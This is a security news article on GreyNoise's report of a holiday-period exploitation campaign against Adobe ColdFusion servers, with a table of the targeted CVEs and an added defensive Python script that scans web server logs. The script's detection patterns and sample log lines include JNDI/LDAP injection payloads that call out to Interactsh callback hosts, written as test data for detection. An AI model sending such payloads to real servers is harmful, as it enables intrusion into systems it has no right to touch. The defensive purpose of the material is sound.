GreyNoise reports a coordinated campaign exploiting about a dozen Adobe ColdFusion vulnerabilities, with thousands of attack attempts observed during the Christmas 2025 holiday.
“GreyNoise observed a coordinated exploitation campaign targeting Adobe ColdFusion servers over the Christmas 2025 holiday period,” reads the report published by GreyNoise. “The attack appears to be a single threat actor operating from Japan-based infrastructure (CTG Server Limited). This source was responsible for ~98% of attack traffic, systematically exploiting 10+ ColdFusion CVEs from 2023-2024.”
A single actor, using Japan-based infrastructure, generated about 98% of the traffic and exploited more than 10 ColdFusion CVEs from 2023–2024. JNDI/LDAP injection was the main vector, and the attacker used ProjectDiscovery Interactsh for out-of-band (OAST) verification, i.e. the payload makes the target call back to an attacker-controlled hostname so that exploitation can be confirmed without a visible response. Most activity occurred on Christmas Day, suggesting deliberate timing to take advantage of reduced holiday staffing and monitoring.
The researchers observed 5,940 malicious requests exploiting ColdFusion vulnerabilities from 2023–2024, peaking on December 25.
Most of the requests targeted servers in the US (4,044), Spain (753), and India (128).

GreyNoise identified a dominant threat actor using two IPs (134.122.136[.]119, 134.122.136[.]96) hosted by CTG Server Limited (AS152194), responsible for nearly all observed ColdFusion exploitation traffic. The two IPs accounted for over 98% of requests, often operated concurrently, shared Interactsh sessions (the same callback hostnames), and showed automated, coordinated behavior cycling through multiple attack types. Minor activity came from a handful of secondary IPs in Canada, India, the US, and Cloudflare-hosted ranges. CTG Server Limited, a Hong Kong–registered provider with rapidly growing IP space, has prior links to phishing, spam, bogon routing, and weak abuse enforcement, raising concerns about its role as a permissive hosting environment.
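The report's three observable traits (the two source IPs, JNDI/LDAP lookup payloads, and Interactsh callback hostnames) can be turned into a simple access-log triage. The script below is an added example for this page, not GreyNoise tooling or code from the report: it parses combined-format web server logs, percent-decodes the request path and User-Agent (including double-encoded payloads), flags lines that match any of the three traits, and groups hits by OAST callback host so that source IPs sharing one Interactsh session show up together. The Interactsh domain list is an assumption from memory of the ProjectDiscovery documentation and should be checked against the current README; the log lines are constructed for the demo.

```python
"""Triage access logs for the ColdFusion campaign traits described above.
Added example for this page; not GreyNoise's tooling."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable
from urllib.parse import unquote

# Source IPs named in the GreyNoise report (as given in the article).
CAMPAIGN_IPS = {"134.122.136.119", "134.122.136.96"}

# Public Interactsh server domains. ASSUMPTION: taken from memory of the
# ProjectDiscovery Interactsh docs; verify against the current README and
# add any self-hosted Interactsh domains your team knows about.
OAST_DOMAINS = ("interact.sh", "oast.pro", "oast.live", "oast.site",
                "oast.online", "oast.fun", "oast.me")

# JNDI lookup syntax, e.g. ${jndi:ldap://host/path}; also ldaps/rmi/dns.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns)\s*:", re.IGNORECASE)

# A hostname ending in an OAST domain; group 1 is the full callback host,
# whose random subdomain identifies one Interactsh session.
OAST_RE = re.compile(
    r"((?:[a-z0-9-]+\.)+(?:" + "|".join(re.escape(d) for d in OAST_DOMAINS)
    + r"))(?![a-z0-9-])",
    re.IGNORECASE,
)

# Combined log format: ip ident user [ts] "METHOD path proto" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+'
    r'(?: "[^"]*" "([^"]*)")?'
)


@dataclass(frozen=True)
class Hit:
    line_no: int
    src_ip: str
    reasons: tuple[str, ...]
    oast_host: str | None


def url_decode(s: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads (%2524%257B) unwrap."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(line: str, line_no: int) -> Hit | None:
    """Return a Hit if the log line shows any campaign trait, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src_ip, _method, path, _status, user_agent = m.groups()
    # Payloads arrive in the query string and in headers such as User-Agent.
    haystack = url_decode(path) + " " + url_decode(user_agent or "")
    reasons = []
    if src_ip in CAMPAIGN_IPS:
        reasons.append("reported campaign source IP")
    if JNDI_RE.search(haystack):
        reasons.append("JNDI lookup in request")
    oast = OAST_RE.search(haystack)
    if oast:
        reasons.append("Interactsh OAST callback host")
    if not reasons:
        return None
    return Hit(line_no, src_ip, tuple(reasons), oast.group(1).lower() if oast else None)


def scan(lines: Iterable[str]) -> list[Hit]:
    return [h for h in (classify(l, n) for n, l in enumerate(lines, 1)) if h]


def shared_oast_sessions(hits: Iterable[Hit]) -> dict[str, set[str]]:
    """Map each OAST callback host to the source IPs that used it; several IPs
    behind one host share an Interactsh session, pointing to one operator."""
    sessions: dict[str, set[str]] = defaultdict(set)
    for h in hits:
        if h.oast_host:
            sessions[h.oast_host].add(h.src_ip)
    return dict(sessions)


# Constructed sample log lines for the demo; not traffic from the report.
SAMPLE_LOG = [
    '134.122.136.119 - - [25/Dec/2025:03:12:44 +0000] "GET /index.cfm HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '134.122.136.96 - - [25/Dec/2025:03:12:45 +0000] "GET /index.cfm?x=%24%7Bjndi%3Aldap%3A%2F%2Fabc123.oast.fun%2Fa%7D HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [25/Dec/2025:03:13:01 +0000] "GET /index.cfm HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [25/Dec/2025:03:13:05 +0000] "GET /search.cfm HTTP/1.1" 200 100 "-" "${jndi:ldap://evil.interact.sh/x}"',
    '134.122.136.119 - - [25/Dec/2025:03:13:09 +0000] "POST /index.cfm?q=%2524%257Bjndi%253Aldap%253A%252F%252Fabc123.oast.fun%252Fb%257D HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        tail = f" [{h.oast_host}]" if h.oast_host else ""
        print(f"line {h.line_no}: {h.src_ip} -> {', '.join(h.reasons)}{tail}")
    for host, ips in shared_oast_sessions(hits).items():
        print(f"OAST host {host} used by {sorted(ips)}")
```

Run it against a real log with `scan(open("access.log"))`; the IP match alone only catches the two reported addresses, so the JNDI and OAST checks are what generalize to the secondary IPs and to the same operator moving infrastructure. Matching on the `${jndi:` syntax is a detection of the injection attempt, not proof that the server was vulnerable; a callback recorded in your DNS or egress logs to one of the flagged hosts is the stronger signal.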
Below is the list of targeted ColdFusion vulnerabilities, with the number of requests GreyNoise observed for each (the two "Generic" rows are RCE and LFI probes not tied to a specific CVE):
| CVE | Type | Requests observed |
|---|---|---|
| Generic RCE | Remote Code Execution | 1,403 |
| Generic LFI | Local File Inclusion | 904 |
| CVE-2023-26359 | Deserialization RCE | 833 |
| CVE-2023-38205 | Access Control Bypass | 654 |
| CVE-2023-44353 | Remote Code Execution | 611 |
| CVE-2023-38203 | Remote Code Execution | 346 |
| CVE-2023-38204 | Remote Code Execution | 346 |
| CVE-2023-29298 | Access Control Bypass | 342 |
| CVE-2023-29300 | Remote Code Execution | 176 |
| CVE-2023-26347 | Access Control Bypass | 171 |
| CVE-2024-20767 | Arbitrary File Read | 146 |
| CVE-2023-44352 | Reflected XSS | 8 |
Analysis shows the ColdFusion activity was only about 0.2% of a much larger vulnerability scanning campaign conducted from the same two IPs. Overall, the operation generated more than 2.5 million requests targeting 767 CVEs spanning 2001–2025, with over 1,200 attack signatures and thousands of unique fingerprints and out-of-band (OAST) callback domains.
The campaign focused mainly on reconnaissance, followed by CVE exploitation, LFI, and RCE attempts. It targeted more than 47 technology stacks, including Java application servers, web frameworks, CMS platforms, network devices, and enterprise software. The scale, breadth of CVEs, and automation indicators point to a systematic, template-based reconnaissance effort covering the global vulnerability landscape rather than a ColdFusion-specific operation.
The experts published Indicators of Compromise for this campaign.
(SecurityAffairs – hacking, Adobe)